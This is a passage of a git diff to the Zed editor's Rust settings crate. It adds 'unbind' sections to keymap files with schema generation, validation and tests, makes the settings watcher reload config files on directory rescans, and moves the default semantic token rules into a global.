db.write_kvp(SESSION_WINDOW_STACK_KEY.to_string(), window_ids_json) .await .log_err(); } diff --git a/crates/settings/Cargo.toml b/crates/settings/Cargo.toml index 27e8182d37ba1c67700d3a41dbdfc1c4ce27e4d6..a0d75e5b76fd4a0066ff606585088f61a23d19a1 100644 --- a/crates/settings/Cargo.toml +++ b/crates/settings/Cargo.toml @@ -27,7 +27,7 @@ log.workspace = true migrator.workspace = true paths.workspace = true release_channel.workspace = true -rust-embed = { workspace = true, features = ["debug-embed"] } +rust-embed.workspace = true schemars.workspace = true serde.workspace = true serde_json.workspace = true diff --git a/crates/settings/src/keymap_file.rs b/crates/settings/src/keymap_file.rs index 67f41b14521480e7082f4070db0ed50d4dfdc1fe..f4529e305a4428b1ab9ead8671542108b963216b 100644 --- a/crates/settings/src/keymap_file.rs +++ b/crates/settings/src/keymap_file.rs @@ -4,7 +4,7 @@ use fs::Fs; use gpui::{ Action, ActionBuildError, App, InvalidKeystrokeError, KEYSTROKE_PARSE_EXPECTED_MESSAGE, KeyBinding, KeyBindingContextPredicate, KeyBindingMetaIndex, KeybindingKeystroke, Keystroke, - NoAction, SharedString, generate_list_of_all_registered_actions, register_action, + NoAction, SharedString, Unbind, generate_list_of_all_registered_actions, register_action, }; use schemars::{JsonSchema, json_schema}; use serde::Deserialize; @@ -73,6 +73,10 @@ pub struct KeymapSection { /// on macOS. See the documentation for more details. #[serde(default)] use_key_equivalents: bool, + /// This keymap section's unbindings, as a JSON object mapping keystrokes to actions. These are + /// parsed before `bindings`, so bindings later in the same section can still take precedence. + #[serde(default)] + unbind: Option>, /// This keymap section's bindings, as a JSON object mapping keystrokes to actions. The /// keystrokes key is a string representing a sequence of keystrokes to type, where the /// keystrokes are separated by whitespace. Each keystroke is a sequence of modifiers (`ctrl`, @@ -135,6 +139,20 @@ impl JsonSchema for KeymapAction { } } +#[derive(Debug, Deserialize, Default, Clone)] +#[serde(transparent)] +pub struct UnbindTargetAction(Value); + +impl JsonSchema for UnbindTargetAction { + fn schema_name() -> Cow<'static, str> { + "UnbindTargetAction".into() + } + + fn json_schema(_: &mut schemars::SchemaGenerator) -> schemars::Schema { + json_schema!(true) + } +} + #[derive(Debug)] #[must_use] pub enum KeymapFileLoadResult { @@ -231,6 +249,7 @@ impl KeymapFile { for KeymapSection { context, use_key_equivalents, + unbind, bindings, unrecognized_fields, } in keymap_file.0.iter() @@ -244,7 +263,7 @@ impl KeymapFile { // Leading space is to separate from the message indicating which section // the error occurred in. errors.push(( - context, + context.clone(), format!(" Parse error in section `context` field: {}", err), )); continue; @@ -263,6 +282,38 @@ impl KeymapFile { .unwrap(); } + if let Some(unbind) = unbind { + for (keystrokes, action) in unbind { + let result = Self::load_unbinding( + keystrokes, + action, + context_predicate.clone(), + *use_key_equivalents, + cx, + ); + match result { + Ok(key_binding) => { + key_bindings.push(key_binding); + } + Err(err) => { + let mut lines = err.lines(); + let mut indented_err = lines.next().unwrap().to_string(); + for line in lines { + indented_err.push_str(" "); + indented_err.push_str(line); + indented_err.push_str("\n"); + } + write!( + section_errors, + "\n\n- In unbind {}, {indented_err}", + MarkdownInlineCode(&format!("\"{}\"", keystrokes)) + ) + .unwrap(); + } + } + } + } + if let Some(bindings) = bindings { for (keystrokes, action) in bindings { let result = Self::load_keybinding( @@ -296,7 +347,7 @@ impl KeymapFile { } if !section_errors.is_empty() { - errors.push((context, section_errors)) + errors.push((context.clone(), section_errors)) } } @@ -332,7 +383,17 @@ impl KeymapFile { use_key_equivalents: bool, cx: &App, ) -> std::result::Result { - let (action, action_input_string) = Self::build_keymap_action(action, cx)?; + Self::load_keybinding_action_value(keystrokes, &action.0, context, use_key_equivalents, cx) + } + + fn load_keybinding_action_value( + keystrokes: &str, + action: &Value, + context: Option>, + use_key_equivalents: bool, + cx: &App, + ) -> std::result::Result { + let (action, action_input_string) = Self::build_keymap_action_value(action, cx)?; let key_binding = match KeyBinding::load( keystrokes, @@ -362,23 +423,70 @@ impl KeymapFile { } } + fn load_unbinding( + keystrokes: &str, + action: &UnbindTargetAction, + context: Option>, + use_key_equivalents: bool, + cx: &App, + ) -> std::result::Result { + let key_binding = Self::load_keybinding_action_value( + keystrokes, + &action.0, + context, + use_key_equivalents, + cx, + )?; + + if key_binding.action().partial_eq(&NoAction) { + return Err("expected action name string or [name, input] array.".to_string()); + } + + if key_binding.action().name() == Unbind::name_for_type() { + return Err(format!( + "can't use {} as an unbind target.", + MarkdownInlineCode(&format!("\"{}\"", Unbind::name_for_type())) + )); + } + + KeyBinding::load( + keystrokes, + Box::new(Unbind(key_binding.action().name().into())), + key_binding.predicate(), + use_key_equivalents, + key_binding.action_input(), + cx.keyboard_mapper().as_ref(), + ) + .map_err(|InvalidKeystrokeError { keystroke }| { + format!( + "invalid keystroke {}. {}", + MarkdownInlineCode(&format!("\"{}\"", &keystroke)), + KEYSTROKE_PARSE_EXPECTED_MESSAGE + ) + }) + } + pub fn parse_action( action: &KeymapAction, ) -> Result)>, String> { - let name_and_input = match &action.0 { + Self::parse_action_value(&action.0) + } + + fn parse_action_value(action: &Value) -> Result)>, String> { + let name_and_input = match action { Value::Array(items) => { if items.len() != 2 { return Err(format!( "expected two-element array of `[name, input]`. \ Instead found {}.", - MarkdownInlineCode(&action.0.to_string()) + MarkdownInlineCode(&action.to_string()) )); } let serde_json::Value::String(ref name) = items[0] else { return Err(format!( "expected two-element array of `[name, input]`, \ but the first element is not a string in {}.", - MarkdownInlineCode(&action.0.to_string()) + MarkdownInlineCode(&action.to_string()) )); }; Some((name, Some(&items[1]))) @@ -389,7 +497,7 @@ impl KeymapFile { return Err(format!( "expected two-element array of `[name, input]`. \ Instead found {}.", - MarkdownInlineCode(&action.0.to_string()) + MarkdownInlineCode(&action.to_string()) )); } }; @@ -400,7 +508,14 @@ impl KeymapFile { action: &KeymapAction, cx: &App, ) -> std::result::Result<(Box, Option), String> { - let (build_result, action_input_string) = match Self::parse_action(action)? { + Self::build_keymap_action_value(&action.0, cx) + } + + fn build_keymap_action_value( + action: &Value, + cx: &App, + ) -> std::result::Result<(Box, Option), String> { + let (build_result, action_input_string) = match Self::parse_action_value(action)? { Some((name, action_input)) if name.as_str() == ActionSequence::name_for_type() => { match action_input { Some(action_input) => ( @@ -583,9 +698,15 @@ impl KeymapFile { "minItems": 2, "maxItems": 2 }); - let mut keymap_action_alternatives = vec![empty_action_name, empty_action_name_with_input]; + let mut keymap_action_alternatives = vec![ + empty_action_name.clone(), + empty_action_name_with_input.clone(), + ]; + let mut unbind_target_action_alternatives = + vec![empty_action_name, empty_action_name_with_input]; let mut empty_schema_action_names = vec![]; + let mut empty_schema_unbind_target_action_names = vec![]; for (name, action_schema) in action_schemas.into_iter() { let deprecation = if name == NoAction.name() { Some("null") @@ -593,6 +714,9 @@ impl KeymapFile { deprecations.get(name).copied() }; + let include_in_unbind_target_schema = + name != NoAction.name() && name != Unbind::name_for_type(); + // Add an alternative for plain action names. let mut plain_action = json_schema!({ "type": "string", @@ -607,7 +731,10 @@ impl KeymapFile { if let Some(description) = &description { add_description(&mut plain_action, description); } - keymap_action_alternatives.push(plain_action); + keymap_action_alternatives.push(plain_action.clone()); + if include_in_unbind_target_schema { + unbind_target_action_alternatives.push(plain_action); + } // Add an alternative for actions with data specified as a [name, data] array. // @@ -633,9 +760,15 @@ impl KeymapFile { "minItems": 2, "maxItems": 2 }); - keymap_action_alternatives.push(action_with_input); + keymap_action_alternatives.push(action_with_input.clone()); + if include_in_unbind_target_schema { + unbind_target_action_alternatives.push(action_with_input); + } } else { empty_schema_action_names.push(name); + if include_in_unbind_target_schema { + empty_schema_unbind_target_action_names.push(name); + } } } @@ -659,20 +792,44 @@ impl KeymapFile { keymap_action_alternatives.push(actions_with_empty_input); } + if !empty_schema_unbind_target_action_names.is_empty() { + let action_names = json_schema!({ "enum": empty_schema_unbind_target_action_names }); + let no_properties_allowed = json_schema!({ + "type": "object", + "additionalProperties": false + }); + let mut actions_with_empty_input = json_schema!({ + "type": "array", + "items": [action_names, no_properties_allowed], + "minItems": 2, + "maxItems": 2 + }); + add_deprecation( + &mut actions_with_empty_input, + "This action does not take input - just the action name string should be used." + .to_string(), + ); + unbind_target_action_alternatives.push(actions_with_empty_input); + } + // Placing null first causes json-language-server to default assuming actions should be // null, so place it last. keymap_action_alternatives.push(json_schema!({ "type": "null" })); - // The `KeymapSection` schema will reference the `KeymapAction` schema by name, so setting - // the definition of `KeymapAction` results in the full action schema being used. generator.definitions_mut().insert( KeymapAction::schema_name().to_string(), json!({ "anyOf": keymap_action_alternatives }), ); + generator.definitions_mut().insert( + UnbindTargetAction::schema_name().to_string(), + json!({ + "anyOf": unbind_target_action_alternatives + }), + ); generator.root_schema_for::().to_value() } @@ -701,31 +858,32 @@ impl KeymapFile { tab_size: usize, keyboard_mapper: &dyn gpui::PlatformKeyboardMapper, ) -> Result { - match operation { + // When replacing or removing a non-user binding, we may need to write an unbind entry + // to suppress the original default binding. + let mut suppression_unbind: Option> = None; + + match &operation { // if trying to replace a keybinding that is not user-defined, treat it as an add operation KeybindUpdateOperation::Replace { target_keybind_source: target_source, source, target, - } if target_source != KeybindSource::User => { + } if *target_source != KeybindSource::User => { + if target.keystrokes_unparsed() != source.keystrokes_unparsed() { + suppression_unbind = Some(target.clone()); + } operation = KeybindUpdateOperation::Add { - source, - from: Some(target), + source: source.clone(), + from: Some(target.clone()), }; } - // if trying to remove a keybinding that is not user-defined, treat it as creating a binding - // that binds it to `zed::NoAction` + // if trying to remove a keybinding that is not user-defined, treat it as creating an + // unbind entry for the removed action KeybindUpdateOperation::Remove { target, target_keybind_source, - } if target_keybind_source != KeybindSource::User => { - let mut source = target.clone(); - source.action_name = gpui::NoAction.name(); - source.action_arguments.take(); - operation = KeybindUpdateOperation::Add { - source, - from: Some(target), - }; + } if *target_keybind_source != KeybindSource::User => { + suppression_unbind = Some(target.clone()); } _ => {} } @@ -734,34 +892,41 @@ impl KeymapFile { // We don't want to modify the file if it's invalid. let keymap = Self::parse(&keymap_contents).context("Failed to parse keymap")?; - if let KeybindUpdateOperation::Remove { target, .. } = operation { - let target_action_value = target - .action_value() - .context("Failed to generate target action JSON value")?; - let Some((index, keystrokes_str)) = - find_binding(&keymap, &target, &target_action_value, keyboard_mapper) - else { - anyhow::bail!("Failed to find keybinding to remove"); - }; - let is_only_binding = keymap.0[index] - .bindings - .as_ref() - .is_none_or(|bindings| bindings.len() == 1); - let key_path: &[&str] = if is_only_binding { - &[] - } else { - &["bindings", keystrokes_str] - }; - let (replace_range, replace_value) = replace_top_level_array_value_in_json_text( - &keymap_contents, - key_path, - None, - None, - index, - tab_size, - ); - keymap_contents.replace_range(replace_range, &replace_value); - return Ok(keymap_contents); + if let KeybindUpdateOperation::Remove { + target, + target_keybind_source, + } = &operation + { + if *target_keybind_source == KeybindSource::User { + let target_action_value = target + .action_value() + .context("Failed to generate target action JSON value")?; + let Some(binding_location) = + find_binding(&keymap, target, &target_action_value, keyboard_mapper) + else { + anyhow::bail!("Failed to find keybinding to remove"); + }; + let is_only_binding = binding_location.is_only_entry_in_section(&keymap); + let key_path: &[&str] = if is_only_binding { + &[] + } else { + &[ + binding_location.kind.key_path(), + binding_location.keystrokes_str, + ] + }; + let (replace_range, replace_value) = replace_top_level_array_value_in_json_text( + &keymap_contents, + key_path, + None, + None, + binding_location.index, + tab_size, + ); + keymap_contents.replace_range(replace_range, &replace_value); + + return Ok(keymap_contents); + } } if let KeybindUpdateOperation::Replace { source, target, .. } = operation { @@ -772,7 +937,7 @@ impl KeymapFile { .action_value() .context("Failed to generate source action JSON value")?; - if let Some((index, keystrokes_str)) = + if let Some(binding_location) = find_binding(&keymap, &target, &target_action_value, keyboard_mapper) { if target.context == source.context { @@ -781,30 +946,32 @@ impl KeymapFile { let (replace_range, replace_value) = replace_top_level_array_value_in_json_text( &keymap_contents, - &["bindings", keystrokes_str], + &[ + binding_location.kind.key_path(), + binding_location.keystrokes_str, + ], Some(&source_action_value), Some(&source.keystrokes_unparsed()), - index, + binding_location.index, tab_size, ); keymap_contents.replace_range(replace_range, &replace_value); return Ok(keymap_contents); - } else if keymap.0[index] - .bindings - .as_ref() - .is_none_or(|bindings| bindings.len() == 1) - { + } else if binding_location.is_only_entry_in_section(&keymap) { // if we are replacing the only binding in the section, // just update the section in place, updating the context // and the binding let (replace_range, replace_value) = replace_top_level_array_value_in_json_text( &keymap_contents, - &["bindings", keystrokes_str], + &[ + binding_location.kind.key_path(), + binding_location.keystrokes_str, + ], Some(&source_action_value), Some(&source.keystrokes_unparsed()), - index, + binding_location.index, tab_size, ); keymap_contents.replace_range(replace_range, &replace_value); @@ -814,7 +981,7 @@ impl KeymapFile { &["context"], source.context.map(Into::into).as_ref(), None, - index, + binding_location.index, tab_size, ); keymap_contents.replace_range(replace_range, &replace_value); @@ -827,10 +994,13 @@ impl KeymapFile { let (replace_range, replace_value) = replace_top_level_array_value_in_json_text( &keymap_contents, - &["bindings", keystrokes_str], + &[ + binding_location.kind.key_path(), + binding_location.keystrokes_str, + ], None, None, - index, + binding_location.index, tab_size, ); keymap_contents.replace_range(replace_range, &replace_value); @@ -865,8 +1035,9 @@ impl KeymapFile { } let use_key_equivalents = from.and_then(|from| { let action_value = from.action_value().context("Failed to serialize action value. `use_key_equivalents` on new keybinding may be incorrect.").log_err()?; - let (index, _) = find_binding(&keymap, &from, &action_value, keyboard_mapper)?; - Some(keymap.0[index].use_key_equivalents) + let binding_location = + find_binding(&keymap, &from, &action_value, keyboard_mapper)?; + Some(keymap.0[binding_location.index].use_key_equivalents) }).unwrap_or(false); if use_key_equivalents { value.insert("use_key_equivalents".to_string(), true.into()); @@ -886,6 +1057,28 @@ impl KeymapFile { ); keymap_contents.replace_range(replace_range, &replace_value); } + + if let Some(suppression_unbind) = suppression_unbind { + let mut value = serde_json::Map::with_capacity(2); + if let Some(context) = suppression_unbind.context { + value.insert("context".to_string(), context.into()); + } + value.insert("unbind".to_string(), { + let mut unbind = serde_json::Map::new(); + unbind.insert( + suppression_unbind.keystrokes_unparsed(), + suppression_unbind.action_value()?, + ); + unbind.into() + }); + let (replace_range, replace_value) = append_top_level_array_value_in_json_text( + &keymap_contents, + &value.into(), + tab_size, + ); + keymap_contents.replace_range(replace_range, &replace_value); + } + return Ok(keymap_contents); fn find_binding<'a, 'b>( @@ -893,7 +1086,7 @@ impl KeymapFile { target: &KeybindUpdateTarget<'a>, target_action_value: &Value, keyboard_mapper: &dyn gpui::PlatformKeyboardMapper, - ) -> Option<(usize, &'b str)> { + ) -> Option> { let target_context_parsed = KeyBindingContextPredicate::parse(target.context.unwrap_or("")).ok(); for (index, section) in keymap.sections().enumerate() { @@ -902,40 +1095,108 @@ impl KeymapFile { if section_context_parsed != target_context_parsed { continue; } - let Some(bindings) = §ion.bindings else { + + if let Some(binding_location) = find_binding_in_entries( + section.bindings.as_ref(), + BindingKind::Binding, + index, + target, + target_action_value, + keyboard_mapper, + |action| &action.0, + ) { + return Some(binding_location); + } + + if let Some(binding_location) = find_binding_in_entries( + section.unbind.as_ref(), + BindingKind::Unbind, + index, + target, + target_action_value, + keyboard_mapper, + |action| &action.0, + ) { + return Some(binding_location); + } + } + None + } + + fn find_binding_in_entries<'a, 'b, T>( + entries: Option<&'b IndexMap>, + kind: BindingKind, + index: usize, + target: &KeybindUpdateTarget<'a>, + target_action_value: &Value, + keyboard_mapper: &dyn gpui::PlatformKeyboardMapper, + action_value: impl Fn(&T) -> &Value, + ) -> Option> { + let entries = entries?; + for (keystrokes_str, action) in entries { + let Ok(keystrokes) = keystrokes_str + .split_whitespace() + .map(|source| { + let keystroke = Keystroke::parse(source)?; + Ok(KeybindingKeystroke::new_with_mapper( + keystroke, + false, + keyboard_mapper, + )) + }) + .collect::, InvalidKeystrokeError>>() + else { continue; }; - for (keystrokes_str, action) in bindings { - let Ok(keystrokes) = keystrokes_str - .split_whitespace() - .map(|source| { - let keystroke = Keystroke::parse(source)?; - Ok(KeybindingKeystroke::new_with_mapper( - keystroke, - false, - keyboard_mapper, - )) - }) - .collect::, InvalidKeystrokeError>>() - else { - continue; - }; - if keystrokes.len() != target.keystrokes.len() - || !keystrokes - .iter() - .zip(target.keystrokes) - .all(|(a, b)| a.inner().should_match(b)) - { - continue; - } - if &action.0 != target_action_value { - continue; - } - return Some((index, keystrokes_str)); + if keystrokes.len() != target.keystrokes.len() + || !keystrokes + .iter() + .zip(target.keystrokes) + .all(|(a, b)| a.inner().should_match(b)) + { + continue; } + if action_value(action) != target_action_value { + continue; + } + return Some(BindingLocation { + index, + kind, + keystrokes_str, + }); } None } + + #[derive(Copy, Clone)] + enum BindingKind { + Binding, + Unbind, + } + + impl BindingKind { + fn key_path(self) -> &'static str { + match self { + Self::Binding => "bindings", + Self::Unbind => "unbind", + } + } + } + + struct BindingLocation<'a> { + index: usize, + kind: BindingKind, + keystrokes_str: &'a str, + } + + impl BindingLocation<'_> { + fn is_only_entry_in_section(&self, keymap: &KeymapFile) -> bool { + let section = &keymap.0[self.index]; + let binding_count = section.bindings.as_ref().map_or(0, IndexMap::len); + let unbind_count = section.unbind.as_ref().map_or(0, IndexMap::len); + binding_count + unbind_count == 1 + } + } } } @@ -1228,7 +1489,8 @@ impl Action for ActionSequence { #[cfg(test)] mod tests { - use gpui::{DummyKeyboardMapper, KeybindingKeystroke, Keystroke}; + use gpui::{Action, App, DummyKeyboardMapper, KeybindingKeystroke, Keystroke, Unbind}; + use serde_json::Value; use unindent::Unindent; use crate::{ @@ -1236,6 +1498,8 @@ mod tests { keymap_file::{KeybindUpdateOperation, KeybindUpdateTarget}, }; + gpui::actions!(test_keymap_file, [StringAction, InputAction]); + #[test] fn can_deserialize_keymap_with_trailing_comma() { let json = indoc::indoc! {"[ @@ -1251,6 +1515,191 @@ mod tests { KeymapFile::parse(json).unwrap(); } + #[gpui::test] + fn keymap_section_unbinds_are_loaded_before_bindings(cx: &mut App) { + let key_bindings = match KeymapFile::load( + indoc::indoc! {r#" + [ + { + "unbind": { + "ctrl-a": "test_keymap_file::StringAction", + "ctrl-b": ["test_keymap_file::InputAction", {}] + }, + "bindings": { + "ctrl-c": "test_keymap_file::StringAction" + } + } + ] + "#}, + cx, + ) { + crate::keymap_file::KeymapFileLoadResult::Success { key_bindings } => key_bindings, + crate::keymap_file::KeymapFileLoadResult::SomeFailedToLoad { + error_message, .. + } => { + panic!("{error_message}"); + } + crate::keymap_file::KeymapFileLoadResult::JsonParseFailure { error } => { + panic!("JSON parse error: {error}"); + } + }; + + assert_eq!(key_bindings.len(), 3); + assert!( + key_bindings[0] + .action() + .partial_eq(&Unbind("test_keymap_file::StringAction".into())) + ); + assert_eq!(key_bindings[0].action_input(), None); + assert!( + key_bindings[1] + .action() + .partial_eq(&Unbind("test_keymap_file::InputAction".into())) + ); + assert_eq!( + key_bindings[1] + .action_input() + .as_ref() + .map(ToString::to_string), + Some("{}".to_string()) + ); + assert_eq!( + key_bindings[2].action().name(), + "test_keymap_file::StringAction" + ); + } + + #[gpui::test] + fn keymap_unbind_loads_valid_target_action_with_input(cx: &mut App) { + let key_bindings = match KeymapFile::load( + indoc::indoc! {r#" + [ + { + "unbind": { + "ctrl-a": ["test_keymap_file::InputAction", {}] + } + } + ] + "#}, + cx, + ) { + crate::keymap_file::KeymapFileLoadResult::Success { key_bindings } => key_bindings, + other => panic!("expected Success, got {other:?}"), + }; + + assert_eq!(key_bindings.len(), 1); + assert!( + key_bindings[0] + .action() + .partial_eq(&Unbind("test_keymap_file::InputAction".into())) + ); + assert_eq!( + key_bindings[0] + .action_input() + .as_ref() + .map(ToString::to_string), + Some("{}".to_string()) + ); + } + + #[gpui::test] + fn keymap_unbind_rejects_null(cx: &mut App) { + match KeymapFile::load( + indoc::indoc! {r#" + [ + { + "unbind": { + "ctrl-a": null + } + } + ] + "#}, + cx, + ) { + crate::keymap_file::KeymapFileLoadResult::SomeFailedToLoad { + key_bindings, + error_message, + } => { + assert!(key_bindings.is_empty()); + assert!( + error_message + .0 + .contains("expected action name string or [name, input] array.") + ); + } + other => panic!("expected SomeFailedToLoad, got {other:?}"), + } + } + + #[gpui::test] + fn keymap_unbind_rejects_unbind_action(cx: &mut App) { + match KeymapFile::load( + indoc::indoc! {r#" + [ + { + "unbind": { + "ctrl-a": ["zed::Unbind", "test_keymap_file::StringAction"] + } + } + ] + "#}, + cx, + ) { + crate::keymap_file::KeymapFileLoadResult::SomeFailedToLoad { + key_bindings, + error_message, + } => { + assert!(key_bindings.is_empty()); + assert!( + error_message + .0 + .contains("can't use `\"zed::Unbind\"` as an unbind target.") + ); + } + other => panic!("expected SomeFailedToLoad, got {other:?}"), + } + } + + #[test] + fn keymap_schema_for_unbind_excludes_null_and_unbind_action() { + fn schema_allows(schema: &Value, expected: &Value) -> bool { + match schema { + Value::Object(object) => { + if object.get("const") == Some(expected) { + return true; + } + if object.get("type") == Some(&Value::String("null".to_string())) + && expected == &Value::Null + { + return true; + } + object.values().any(|value| schema_allows(value, expected)) + } + Value::Array(items) => items.iter().any(|value| schema_allows(value, expected)), + _ => false, + } + } + + let schema = KeymapFile::generate_json_schema_from_inventory(); + let unbind_schema = schema + .pointer("/$defs/UnbindTargetAction") + .expect("missing UnbindTargetAction schema"); + + assert!(!schema_allows(unbind_schema, &Value::Null)); + assert!(!schema_allows( + unbind_schema, + &Value::String(Unbind::name_for_type().to_string()) + )); + assert!(schema_allows( + unbind_schema, + &Value::String("test_keymap_file::StringAction".to_string()) + )); + assert!(schema_allows( + unbind_schema, + &Value::String("test_keymap_file::InputAction".to_string()) + )); + } + #[track_caller] fn check_keymap_update( input: impl ToString, @@ -1479,6 +1928,102 @@ mod tests { } ] } + }, + { + "unbind": { + "ctrl-a": "zed::SomeAction" + } + } + ]"# + .unindent(), + ); + + // Replacing a non-user binding without changing the keystroke should + // not produce an unbind suppression entry. + check_keymap_update( + r#"[ + { + "bindings": { + "ctrl-a": "zed::SomeAction" + } + } + ]"# + .unindent(), + KeybindUpdateOperation::Replace { + target: KeybindUpdateTarget { + keystrokes: &parse_keystrokes("ctrl-a"), + action_name: "zed::SomeAction", + context: None, + action_arguments: None, + }, + source: KeybindUpdateTarget { + keystrokes: &parse_keystrokes("ctrl-a"), + action_name: "zed::SomeOtherAction", + context: None, + action_arguments: None, + }, + target_keybind_source: KeybindSource::Base, + }, + r#"[ + { + "bindings": { + "ctrl-a": "zed::SomeAction" + } + }, + { + "bindings": { + "ctrl-a": "zed::SomeOtherAction" + } + } + ]"# + .unindent(), + ); + + // Replacing a non-user binding with a context and a keystroke change + // should produce a suppression entry that preserves the context. + check_keymap_update( + r#"[ + { + "context": "SomeContext", + "bindings": { + "ctrl-a": "zed::SomeAction" + } + } + ]"# + .unindent(), + KeybindUpdateOperation::Replace { + target: KeybindUpdateTarget { + keystrokes: &parse_keystrokes("ctrl-a"), + action_name: "zed::SomeAction", + context: Some("SomeContext"), + action_arguments: None, + }, + source: KeybindUpdateTarget { + keystrokes: &parse_keystrokes("ctrl-b"), + action_name: "zed::SomeOtherAction", + context: Some("SomeContext"), + action_arguments: None, + }, + target_keybind_source: KeybindSource::Default, + }, + r#"[ + { + "context": "SomeContext", + "bindings": { + "ctrl-a": "zed::SomeAction" + } + }, + { + "context": "SomeContext", + "bindings": { + "ctrl-b": "zed::SomeOtherAction" + } + }, + { + "context": "SomeContext", + "unbind": { + "ctrl-a": "zed::SomeAction" + } } ]"# .unindent(), @@ -1974,8 +2519,11 @@ mod tests { }, { "context": "SomeContext", - "bindings": { - "a": null + "unbind": { + "a": [ + "foo::baz", + true + ] } } ]"# diff --git a/crates/settings/src/settings.rs b/crates/settings/src/settings.rs index 9049c95eb9529b9a490687e1130af273b7496970..1b75f9395e4f46ec5fd20231956d232c26005107 100644 --- a/crates/settings/src/settings.rs +++ b/crates/settings/src/settings.rs @@ -44,9 +44,9 @@ pub use keymap_file::{ pub use settings_file::*; pub use settings_json::*; pub use settings_store::{ - InvalidSettingsError, LSP_SETTINGS_SCHEMA_URL_PREFIX, LocalSettingsKind, LocalSettingsPath, - MigrationStatus, Settings, SettingsFile, SettingsJsonSchemaParams, SettingsKey, - SettingsLocation, SettingsParseResult, SettingsStore, + DefaultSemanticTokenRules, InvalidSettingsError, LSP_SETTINGS_SCHEMA_URL_PREFIX, + LocalSettingsKind, LocalSettingsPath, MigrationStatus, Settings, SettingsFile, + SettingsJsonSchemaParams, SettingsKey, SettingsLocation, SettingsParseResult, SettingsStore, }; pub use vscode_import::{VsCodeSettings, VsCodeSettingsSource}; @@ -59,13 +59,13 @@ pub struct ActiveSettingsProfileName(pub String); impl Global for ActiveSettingsProfileName {} pub trait UserSettingsContentExt { - fn for_profile(&self, cx: &App) -> Option<&SettingsContent>; + fn for_profile(&self, cx: &App) -> Option<&SettingsProfile>; fn for_release_channel(&self) -> Option<&SettingsContent>; fn for_os(&self) -> Option<&SettingsContent>; } impl UserSettingsContentExt for UserSettingsContent { - fn for_profile(&self, cx: &App) -> Option<&SettingsContent> { + fn for_profile(&self, cx: &App) -> Option<&SettingsProfile> { let Some(active_profile) = cx.try_global::() else { return None; }; diff --git a/crates/settings/src/settings_file.rs b/crates/settings/src/settings_file.rs index f5d0b973340db70819b2b19ae1352a4e1567d670..87ab85aae595faf9a69c45b77d98ea1230ea5162 100644 --- a/crates/settings/src/settings_file.rs +++ b/crates/settings/src/settings_file.rs @@ -5,6 +5,61 @@ use futures::{StreamExt, channel::mpsc}; use gpui::{App, BackgroundExecutor, ReadGlobal}; use std::{path::PathBuf, sync::Arc, time::Duration}; +#[cfg(test)] +mod tests { + use super::*; + use fs::FakeFs; + + use gpui::TestAppContext; + use serde_json::json; + use std::path::Path; + + #[gpui::test] + async fn test_watch_config_dir_reloads_tracked_file_on_rescan(cx: &mut TestAppContext) { + cx.executor().allow_parking(); + + let fs = FakeFs::new(cx.background_executor.clone()); + let config_dir = PathBuf::from("/root/config"); + let settings_path = PathBuf::from("/root/config/settings.json"); + + fs.insert_tree( + Path::new("/root"), + json!({ + "config": { + "settings.json": "A" + } + }), + ) + .await; + + let mut rx = watch_config_dir( + &cx.background_executor, + fs.clone(), + config_dir.clone(), + HashSet::from_iter([settings_path.clone()]), + ); + + assert_eq!(rx.next().await.as_deref(), Some("A")); + cx.run_until_parked(); + + fs.pause_events(); + fs.insert_file(&settings_path, b"B".to_vec()).await; + fs.clear_buffered_events(); + + fs.emit_fs_event(&settings_path, Some(PathEventKind::Rescan)); + fs.unpause_events_and_flush(); + assert_eq!(rx.next().await.as_deref(), Some("B")); + + fs.pause_events(); + fs.insert_file(&settings_path, b"A".to_vec()).await; + fs.clear_buffered_events(); + + fs.emit_fs_event(&config_dir, Some(PathEventKind::Rescan)); + fs.unpause_events_and_flush(); + assert_eq!(rx.next().await.as_deref(), Some("A")); + } +} + pub const EMPTY_THEME_NAME: &str = "empty-theme"; /// Settings for visual tests that use proper fonts instead of Courier. @@ -139,8 +194,25 @@ pub fn watch_config_dir( return; } } + Some(PathEventKind::Rescan) => { + for file_path in &config_paths { + let contents = fs.load(file_path).await.unwrap_or_default(); + if tx.unbounded_send(contents).is_err() { + return; + } + } + } _ => {} } + } else if matches!(event.kind, Some(PathEventKind::Rescan)) + && event.path == dir_path + { + for file_path in &config_paths { + let contents = fs.load(file_path).await.unwrap_or_default(); + if tx.unbounded_send(contents).is_err() { + return; + } + } } } } diff --git a/crates/settings/src/settings_store.rs b/crates/settings/src/settings_store.rs index 411f57375a2303e5e2c30e182365f526989891a4..577ba43e1dd566d32eeec8993ec135633146b020 100644 --- a/crates/settings/src/settings_store.rs +++ b/crates/settings/src/settings_store.rs @@ -36,8 +36,8 @@ use crate::{ LanguageToSettingsMap, LspSettings, LspSettingsMap, SemanticTokenRules, ThemeName, UserSettingsContentExt, VsCodeSettings, WorktreeId, settings_content::{ - ExtensionsSettingsContent, ProjectSettingsContent, RootUserSettings, SettingsContent, - UserSettingsContent, merge_from::MergeFrom, + ExtensionsSettingsContent, ProfileBase, ProjectSettingsContent, RootUserSettings, + SettingsContent, UserSettingsContent, merge_from::MergeFrom, }, }; @@ -241,6 +241,11 @@ impl LocalSettingsPath { impl Global for SettingsStore {} +#[derive(Default)] +pub struct DefaultSemanticTokenRules(pub SemanticTokenRules); + +impl gpui::Global for DefaultSemanticTokenRules {} + #[doc(hidden)] #[derive(Debug)] pub struct SettingValue { @@ -275,29 +280,22 @@ pub struct SettingsJsonSchemaParams<'a> { impl SettingsStore { pub fn new(cx: &mut App, default_settings: &str) -> Self { - Self::new_with_semantic_tokens(cx, default_settings, &crate::default_semantic_token_rules()) + Self::new_with_semantic_tokens(cx, default_settings) } - pub fn new_with_semantic_tokens( - cx: &mut App, - default_settings: &str, - default_semantic_tokens: &str, - ) -> Self { + pub fn new_with_semantic_tokens(cx: &mut App, default_settings: &str) -> Self { let (setting_file_updates_tx, mut setting_file_updates_rx) = mpsc::unbounded(); - let mut default_settings: SettingsContent = + let default_settings: SettingsContent = SettingsContent::parse_json_with_comments(default_settings).unwrap(); - if let Ok(semantic_token_rules) = - crate::parse_json_with_comments::(default_semantic_tokens) - { - let global_lsp = default_settings - .global_lsp_settings - .get_or_insert_with(Default::default); - let existing_rules = global_lsp - .semantic_token_rules - .get_or_insert_with(Default::default); - existing_rules.rules.extend(semantic_token_rules.rules); + if !cx.has_global::() { + cx.set_global::( + crate::parse_json_with_comments::( + &crate::default_semantic_token_rules(), + ) + .map(DefaultSemanticTokenRules) + .unwrap_or_default(), + ); } - let default_settings: Rc = default_settings.into(); let mut this = Self { setting_values: Default::default(), @@ -372,6 +370,10 @@ impl SettingsStore { setting_value.set_global_value(value); } + pub fn merged_settings(&self) -> &SettingsContent { + 